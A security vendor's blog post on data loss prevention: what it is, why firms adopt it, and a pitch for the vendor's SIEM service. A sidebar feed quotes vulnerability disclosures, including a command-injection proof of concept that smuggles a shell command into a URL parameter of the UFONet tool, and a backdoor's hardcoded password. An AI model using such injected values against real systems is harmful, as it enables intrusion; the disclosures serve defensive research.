Data Loss Prevention: definition and uses
Estimated reading time: 7 minutes
data loss prevention (DLP) is a set of tools and processes used to ensure that sensitive data is not lost, misused or accessed by unauthorized users . DLP software classifies regulated, confidential and business critical data and identifies policy violations defined by organizations or within a predefined policy package. Default policies are typically dictated by regulatory compliance such as HIPAA, PCI-DSS, or GDPR.
Once these possible breaches are identified, DLP applies the “remedy” with warnings, encryption and other security actions . The goal is simple: prevent end users from accidentally or maliciously sharing data that could put your business at risk.
Data loss prevention software and tools monitor and control endpoint activities, filter data streams on corporate networks, and monitor data in the cloud to protect data at rest, in motion and in use. DLP also provides reports to meet compliance and auditing requirements. A very useful tool also for identifying areas of weakness and anomalies for incident response.
Do I need to use DLP tools?
data loss prevention addresses three main objectives that are common pain points for many organizations: personal information protection / compliance, intellectual property protection and data visibility.
Protection of personal information / compliance
Does your business collect and store personally identifiable information (PII), protected health information (PHI) or payment card information (PCI)? If so, you are more than likely subject to compliance regulations , such as HIPAA (for PHI) and GDPR (for EU residents’ personal data), which require you to protect your sensitive data. customers.
data loss prevention can identify, classify and label sensitive data and monitor the activities and events surrounding that data . In addition, the reporting capabilities provide the details needed for compliance audits.
Intellectual Property (IP) Protection
Does the company hold important intellectual property and trade or state secrets that could put your financial health and / or brand image at risk in the event of loss or theft? A DLP solution can classify intellectual property in both structured and unstructured form.
With policies and controls in place, you can protect against unwanted exfiltration of this data.
Is the company looking to gain additional visibility into data movement? A complete enterprise DLP solution can help you see and track your data across endpoints, networks, and the cloud. This will provide visibility into how individual users within your organization interact with data. As we have seen before when talking about social engineering , knowing how users behave is very useful. It is used to trace a basic profile and monitor that there are no anomalies that could indicate account compromise.
The ones listed above are primary use cases. But DLP can remedy a variety of other pain points including insider threats, user and entity behavior analysis, and advanced threats.
Why adopt data loss prevention?
In the Gartner Magic Quadrant for Enterprise DLP As of 2017, the total data loss prevention market was estimated to reach $ 1.3 billion in 2020. The size was approximately $ 2.64 billion. The DLP market is not new, but it has evolved to include managed services, cloud functionality, and advanced threat protection, among other things.
All of this, coupled with the increasing trend in large corporate breaches, has spurred the adoption of DLP as a means of protecting sensitive data. Here are nine trends driving DLP adoption.
Growth of CISOs
More and more companies are hiring Chief Information Security Officer (CISO) who report to the CEO. The latter want to know the strategic plan for the prevention of data leaks. data loss prevention tools provide clear value in this regard and give CISOs the reporting capabilities needed to provide regular updates.
Evolution of compliance requests
Global data protection regulations are constantly changing and every organization needs to be adaptable and prepared. In recent years, EU legislators have approved the GDPR . A similar event occurred in the US when New York State adopted the NYDFS Cybersecurity Regulation . These new regulations have both tightened data protection requirements. DLP solutions allow organizations the flexibility to evolve with changes in global regulations.
Increase of “places” where data are stored
Increasing use of the cloud, complicated supply chain networks, and other services over which you no longer have full control have made data protection more complex. Visibility of events and the context surrounding the data before it leaves the organization is important to prevent your sensitive data from falling into the wrong hands.
Frequency of data breaches
National state adversaries, cybercriminals and malicious insiders target your sensitive data for a variety of reasons, such as corporate espionage , personal financial gain and political advantage . Data loss prevention can protect against all kinds of adversaries, whether malicious or not .
In the past few years, there have been thousands of data breaches and many other security incidents. Billions of records were lost in gigantic data breaches such as: database misconfiguration which leaked nearly 200 million US voter records in 2015 , the violation of Equifax data that continued to grow , and the Yahoo breach affecting 3 billion users. These are just a few of the many headlines that underscore the need to protect your organization’s data.
The data value is very high
Stolen data is often sold on the Dark Web, where individuals and criminal groups can buy it and use it to their advantage. With some types of data sold up to thousands of dollars, there is a clear financial incentive for data theft.
There is more data to steal
The definition of what sensitive data is has expanded over the years. Sensitive data now includes intangibles, such as pricing models and business methodologies . From 1975 to 2015, the amount of intangible assets grew from 17% to 84% of the market value, according to a study by Ocean Tomo . These assets also hit a record $ 21 trillion in 2018. This means your business has a lot more data to protect and using data loss prevention could only help with that.
There is a shortage of specialized personnel
The security talent shortage won’t be resolved anytime soon, and there has probably already been an impact on your company. In fact, in a 2017 ESG and ISSA survey, 43% of respondents said their organizations were affected by the lack of skilled personnel . The shortage is worsening with 3.5 million unoccupied security positions expected by the end of 2021. Managed data loss prevention services act as remote extensions of your team to fill this gap of staff.
Adopt a SIEM to implement DLP
By now, a company’s highest value product is the data it manages. The risk of data exfiltration and consequent economic and image loss is just around the corner. It is easy to say that it is enough to protect your data, the reality is that it gets more complicated every day.
The places in which data are used and stored, the methods of access and consultation are increasing. Technology, in general, makes our life easier by exposing our data at the same time. Corporate infrastructures are no less, indeed, due to the very valuable nature of the data collected, they are subject to at a greater risk.
The adoption of an adequate security system is essential and the solutions available are many. We at SOD, speaking of data loss prevention , recommend adopting a SIEM which includes the tools necessary to implement techniques of DLP. For even better protection and more granular control of user data, the SOC as a Service also provides behavioral analysis performed by an artificial intelligence system ( UEBA ).
To find out how these services can help your business protect your data and infrastructure, do not hesitate to contact us, we will be happy to answer any questions.
- Network Traffic Analyzer: an extra gear for the Next Gen SIEM
- The importance of Cyber Threat Intelligence
- Red Team, Blue Team and Purple Team: what are the differences?
- Magecart attack: what it is and how to protect yourself
- 9 reasons why you should consider using a VPN
- The latest PDF phishing trends of 2020
- Predictive cybersecurity with our SOCaaS
- Secure Online Desktop 10 years later: our corporate anniversary
- Backup as a Service (2)
- Cloud Conference (3)
- Cloud CRM (1)
- Cloud Server/VPS (20)
- Conferenza Cloud (4)
- ICT Monitoring (4)
- Log Management (2)
- News (18)
- ownCloud (4)
- Privacy (7)
- Secure Online Desktop (14)
- Security (13)
- Web Hosting (15)
- Law Firm for Ford, Pfizer, Exxon Discloses Ransomware Attack July 19, 2021Campbell Conroy & O'Neil reports the attack affected personal data including Social Security numbers, passport numbers, and payment card data for some individuals.
- US Accuses China of Using Criminal Hackers in Cyber Espionage Operations July 19, 2021DOJ indicts four Chinese individuals for alleged role in attacks targeting intellectual property, trade secrets belonging to defense contractors, maritime companies, aircraft service firms, and others.
- How Gaming Attack Data Aids Defenders Across Industries July 19, 2021Web application attacks against the video game industry quadrupled in 2020 compared to the previous year, but companies outside entertainment can learn from the data.
- NSO Group Spyware Used On Journalists & Activists Worldwide July 19, 2021An investigation finds Pegasus spyware, intended for use on criminals and terrorists, has been used in targeted campaigns against others around the world.
- When Ransomware Comes to (Your) Town July 19, 2021While steps for defending against a ransomware attack vary based on the size of the government entity and the resources available to each one, rooting out ransomware ultimately will come down to two things: system architecture and partnerships.
- Breaking Down the Threat of Going All-In With Microsoft Security July 19, 2021Limit risk by dividing responsibility for infrastructure, tools, and security.
- 7 Ways AI and ML Are Helping and Hurting Cybersecurity July 19, 2021In the right hands, artificial intelligence and machine learning can enrich our cyber defenses. In the wrong hands, they can create significant harm.
- Researchers Create New Approach to Detect Brand Impersonation July 16, 2021A team of Microsoft researchers developed and trained a Siamese Neural Network to detect brand impersonation attacks.
- Recent Attacks Lead to Renewed Calls for Banning Ransom Payments July 16, 2021While attackers in protected jurisdictions continue to get massive sums for continuing to breach organizations, the ransomware threat will only continue to grow.
- 4 Future Integrated Circuit Threats to Watch July 16, 2021Threats to the supply chains for ICs and other computer components are poised to wreak even more havoc on organizations.
- Backdoor.Win32.IRCBot.gen / Unauthenticated Remote Command Execution July 20, 2021Posted by malvuln on Jul 20Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/96f5cdfa5b3416c819d76060f11dc88d.txt Contact: malvuln13 () gmail com Media: twitter.com/malvuln Threat: Backdoor.Win32.IRCBot.gen Vulnerability: Unauthenticated Remote Command Execution Description: The malware listens on TCP port 6777. Third-party attackers who can reach infected systems can execute commands. Commands must be wrapped in quotes or...
- Trojan-Spy.Win32.SpyEyes.hqd / Insecure Permissions July 20, 2021Posted by malvuln on Jul 20Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/6f484fea8f6bb3974185fc856f37541b.txt Contact: malvuln13 () gmail com Media: twitter.com/malvuln Threat: Trojan-Spy.Win32.SpyEyes.hqd Vulnerability: Insecure Permissions Description: The malware creates a dir with insecure permissions under c:\ drive and grants change (C) permissions to the authenticated user group. Standard users can rename the...
- Trojan-Spy.Win32.SpyEyes.abdb / Insecure Permissions July 20, 2021Posted by malvuln on Jul 20Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/9185538b01ad700603f38fb0eb8b6e3b.txt Contact: malvuln13 () gmail com Media: twitter.com/malvuln Threat: Trojan-Spy.Win32.SpyEyes.abdb Vulnerability: Insecure Permissions Description: The malware creates a dir with insecure permissions under c:\ drive and grants change (C) permissions to the authenticated user group. Standard users can rename the...
- Backdoor.Win32.Agent.bjev / Insecure Permissions July 20, 2021Posted by malvuln on Jul 20Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/ca40998b5d62ee7f936537ff3de7993d.txt Contact: malvuln13 () gmail com Media: twitter.com/malvuln Threat: Backdoor.Win32.Agent.bjev Vulnerability: Insecure Permissions Description: The malware creates a dir with insecure permissions under c:\ drive and grants change (C) permissions to the authenticated user group. Standard users can rename the...
- Backdoor.Win32.IRCBot.gen / Weak Hardcoded Password July 20, 2021Posted by malvuln on Jul 20Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/9b12ff6b8b025e7fb0a171abad41c79c.txt Contact: malvuln13 () gmail com Media: twitter.com/malvuln Threat: Backdoor.Win32.IRCBot.gen Vulnerability: Weak Hardcoded Password Description: The malware listens on TCP port 13013. Authentication is required for remote user access. However, the password "slimanus" is weak and hardcoded in plaintext...
- HEUR.Backdoor.Win32.Generic / Unauthenticated Open Proxy July 20, 2021Posted by malvuln on Jul 20Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/f2b5429feaa7d229418cf499ce5f5822.txt Contact: malvuln13 () gmail com Media: twitter.com/malvuln Threat: HEUR.Backdoor.Win32.Generic Vulnerability: Unauthenticated Open Proxy Description: The malware listens on TCP ports 1080, 8080. Third-party attackers who can connect to the infected system can relay requests from the original connection to […]
- HEUR.Backdoor.Win32.Generic / Unauthenticated Open Proxy July 20, 2021Posted by malvuln on Jul 20Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/bcf45d515f2a0c6ead1e44ea6371276b.txt Contact: malvuln13 () gmail com Media: twitter.com/malvuln Threat: HEUR.Backdoor.Win32.Generic Vulnerability: Unauthenticated Open Proxy Description: The malware listens on TCP ports 1080, 8080. Third-party attackers who can connect to the infected system can relay requests from the original connection to […]
- Re: New Release: UFONet v1.7 - "KRäK!eN"... July 20, 2021Posted by psy on Jul 20Hi UFOmmander! Hahahaha.... That teleportation technology can be exploited by many alien races in the galaxy, yes, but it will depend a lot on the pilot experiencies and in the environment in which the aircraft has been built. Some use transparent proxies to avoid going further in those techniques... """ […]
- Multiple vulnerabilities in Dell OpenManage Enterprise July 20, 2021Posted by Pierre Kim on Jul 20## Advisory Information Title: Multiple vulnerabilities in Dell OpenManage Enterprise Advisory URL: https://pierrekim.github.io/advisories/2021-dell-openmanage-enterprise-0x00.txt Blog URL: https://pierrekim.github.io/blog/2021-07-19-dell-openmanage-enterprise-0day-vulnerabilities.html Date published: 2021-07-19 Vendors contacted: Dell Release mode: Coordinated-Disclosure CVE: None yet assigned ## Product description Dell EMC OpenManage...
- Re: [FD] New Release: UFONet v1.7 - "KRäK!eN"... July 20, 2021Posted by Pierre Kim on Jul 20Hi, Attention to all motherships, borgs have been detected inside a blackhole. Brace yourself for the impact: $ curl "http://localhost:9999/cmd_download_botnet_ip?blackhole=';id>/tmp/plop;'" $ cat /tmp/plop uid=0(root) gid=0(root) groups=0(root) Energy shield levels critical! Enemies detected on the deck. Immediate response needed! Can you request a CVE ? Best regards, - Captain Alex […]
Tempo di lettura stimato: 9 minuti Agile working and smart working are now a daily reality for many workers. W… https://t.co/FXpigfCLJ8
Tempo di lettura stimato: 9 minuti Ormai, lavoro agile e smart working sono una realtà quotidiana per molti lavor… https://t.co/AVUdOnRQB7
Tempo di lettura stimato: 9 minuti Nel periodo 2019-2020 si è notato un drammatico aumento del 1160% dei file PDF… https://t.co/78xe9tC59h
Tempo di lettura stimato: 9 minuti There was a dramatic 1160% increase in malicious PDF files in 2019-2020. It… https://t.co/kB9TNUmDfE
Tempo di lettura stimato: 4 minuti Oggi, affrontare un attacco in un SOC aziendale è molto simile ad essere sotto… https://t.co/ryDH2GKDUK